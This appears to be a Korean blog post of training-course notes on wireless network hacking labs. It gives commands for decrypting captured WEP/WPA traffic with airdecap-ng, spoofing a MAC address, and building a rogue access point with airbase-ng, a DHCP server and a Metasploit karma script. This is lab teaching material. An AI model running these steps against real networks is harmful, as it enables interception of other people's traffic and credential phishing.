본문으로 바로가기
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

3. 무선 네트워크 해킹 실습


5) WEP/WPA Decrypt


▣ WEP Decrypt

- 패킷을 모음

- airdecap-ng -w [아스키문자 password] [캡처한 파일명]

☞ 아스키문자 패스워드는 1234면 31:32:33:34 로 넣어야함.

☞ ~~~dec.cap 파일 생성됨.

- WireShark로 cap 파일을 열어서 확인가능.

- 90% ~ 100% 확률로 복호화


▣ WPA Decrypt

- 패킷을 모음.

- airdecap-ng -p [10진수 password] [캡처한 파일명] -e "[SSID]"

- 복호화 확률이 낮음.


☞ hello-01.cap 내용

☞ 복호화 후 생긴 파일 확인

☞ 복호화된 hello-01-dec.cap 내용



6) MAC Spoofing


▣ MAC Spoofing

- wlan0 사용하지 않음 설정

# ifconfig wlan0 down

- MAC 주소 변경

# macchanger -m [변경할 MAC 주소] wlan0

- wlan0 다시 사용 설정

# ifconfig wlan0 up



7) Phising


▣ Phising 3가지 방법

- 그냥 

- 신호를 세게

- probe request 이용


▣ Phising

- eth0에 연결되어 있는 칼리 리눅스 자체를 DHCP 서버로 사용.

- 모니터 모드인 mon0를 이용하여 at0를 생성.


1. dhclient eth0

2. karma.rc & dhcpd.conf & isc-dhcp-server 다운로드.

☞ isc-dhcp-server.deb (설치파일) 설치법 : # dpkg -i isc-dhcp-server.deb

3. cp dhcpd.conf /etc/dhcp

4. airbase-ng -y -c [채널번호] -e "[사용할 SSID]" -v mon0

☞ -y : 그냥 phising용 ap 만들것임.  (-P : Probe Request 용 AP)

☞ at0가 생성되며 비콘을 뿌림.(종료하지 말 것)

5. ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

6. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

7. ifconfig at0

8. /etc/init.d/isc-dhcp-server start

☞ DHCP 서버 시작

9. msfconsole -r karma.rc

☞ karma.rc는 취약점 코드 (로딩 페이지를 띄울것임)


- 로딩페이지는 뜨나 인터넷을 연결안해줬기 때문에 인터넷이 되지는 않음.








i2sec 대구지점 23기 수료생.